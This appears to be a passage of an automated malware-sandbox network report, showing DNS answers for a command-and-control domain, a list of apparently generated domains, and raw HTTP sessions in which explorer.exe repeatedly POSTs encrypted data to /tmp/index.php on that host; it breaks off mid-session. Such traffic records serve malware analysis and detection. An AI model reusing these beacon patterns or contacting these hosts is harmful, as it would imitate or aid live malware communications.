                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444628954 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru63.143.98.185A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444684029 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru63.143.98.185A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:02:38.444715023 CEST1.1.1.1192.168.2.40xfe89No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                      Oct 14, 2024 10:03:46.797075033 CEST1.1.1.1192.168.2.40x10e6No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      • fywxucdqvauxl.com
                                        • nwgrus.ru
                                      • dfegowhoygianb.net
                                      • mxjkymtnwdus.net
                                      • vsicdygcbqjjlt.com
                                      • mrabobimhfaodhs.com
                                      • hgmakgqsadecxk.net
                                      • vyvtnoktgixr.org
                                      • kpctqqwaapll.com
                                      • uwrjqoiyikclmp.org
                                      • irqjlvxvguaa.net
                                      • otrldmaxlwsqg.net
                                      • axdumywgicw.net
                                      • drcsfcxotsike.org
                                      • ljowgttltjb.com
                                      • qqrvxoxcuflyv.org
                                      • bwkcgbjusdxgntcy.net
                                      • oivflmljlhkww.com
                                      • ametqvtlvslgmj.net
                                      • iwhghyqwahgf.net
                                      • bvmbuxbytsytdm.org
                                      • nnhkspmojwnsnbxu.net
                                      • yvnodxcwkvd.org
                                      • dgiwvsfymyh.com
                                      • wrjytrffmsivlanr.net
                                      • estmwlacexvuyc.com
                                      • hvvqajwisec.net
                                      • kctacxfnspruuv.com
                                      • ijnkeenpcqt.com
                                      • lnnfpwyulse.org
                                      • pkoncbxvmuq.com
                                      • ievjgxgogeu.net
                                      • kavychcxkrxbq.net
                                      • nsmkoqlnxxds.com
                                      • gljrhsxnugi.net
                                      • ublngteflakx.net
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449736109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:38.453902006 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://fywxucdqvauxl.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 240
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:38.453923941 CEST240OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 3e bc af
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA .[k,vu >R^N\b'BH5j}.40`Hw_-4qO{$M ;{"^bkV/_TH.qZX/]Oq`cz%
                                      Oct 14, 2024 10:02:39.243119955 CEST152INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:39 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 04 00 00 00 72 e8 87 e8
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449737109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:39.252496958 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://dfegowhoygianb.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 168
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:39.252541065 CEST168OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 2d fc f0
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vud-s%esNAX\W-DD;g@6_RN}#i$[
                                      Oct 14, 2024 10:02:40.057665110 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:39 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449738109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:40.065501928 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://mxjkymtnwdus.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 158
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:40.065593004 CEST158OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 76 22 bc f1
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuv"v\Q9mR'7ht~Kv9?!sz-@BU&/
                                      Oct 14, 2024 10:02:40.996191025 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:40 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449739109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:41.037493944 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://vsicdygcbqjjlt.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 253
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:41.037493944 CEST253OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 70 40 fb 9b
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vup@E @Zk1]]XvnvVB0`YzNN{-<SS~$A\Z.PW-x {Wi3112qBA\Bqg{(#4
                                      Oct 14, 2024 10:02:41.830756903 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:41 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449740109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:41.838699102 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://mrabobimhfaodhs.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 289
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:41.838699102 CEST289OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 58 15 f3 fb
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuXbhObWFE@UhaD8~~}nG8R+1Bnut$<`&|,X\}3z'!!9}=.FzGDy=_<,
                                      Oct 14, 2024 10:02:42.637752056 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449741109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:42.647681952 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://hgmakgqsadecxk.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 297
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:42.647697926 CEST297OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 44 2d ba 88
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuD-o&kkem@c;MF8m!i%IVBMF!uG/O$kICRIU82^o->o7r21!F6A
                                      Oct 14, 2024 10:02:43.564790964 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:43 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449742109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:43.586003065 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://vyvtnoktgixr.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 146
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:43.586028099 CEST146OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2f 24 d3 e7
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu/$Dkrlns!n2SLgh_>[L3h%
                                      Oct 14, 2024 10:02:44.373192072 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:44 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449743109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:44.384479046 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://kpctqqwaapll.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 259
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:44.384479046 CEST259OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2b 07 e8 e9
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu+`)~c=lR]~(]_;n}NX@?']Q_@IWBA0sBFj<DGxcM vV}Wsmm\Ul
                                      Oct 14, 2024 10:02:45.213128090 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449744109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:45.222959995 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://uwrjqoiyikclmp.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 276
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:45.222994089 CEST276OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 34 40 d9 a7
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu4@s[Rkd:S r^DBIW*?Z7%ggQ'A$1XX^,e=J7-'>U5hmSL|e!V?m
                                      Oct 14, 2024 10:02:46.040815115 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449745109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:46.120929956 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://irqjlvxvguaa.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 141
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:46.120958090 CEST141OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 45 43 ca 8c
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuECW#XkM(WL_G4lU@^"JH"
                                      Oct 14, 2024 10:02:47.032917976 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449746109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:47.046334982 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://otrldmaxlwsqg.net/
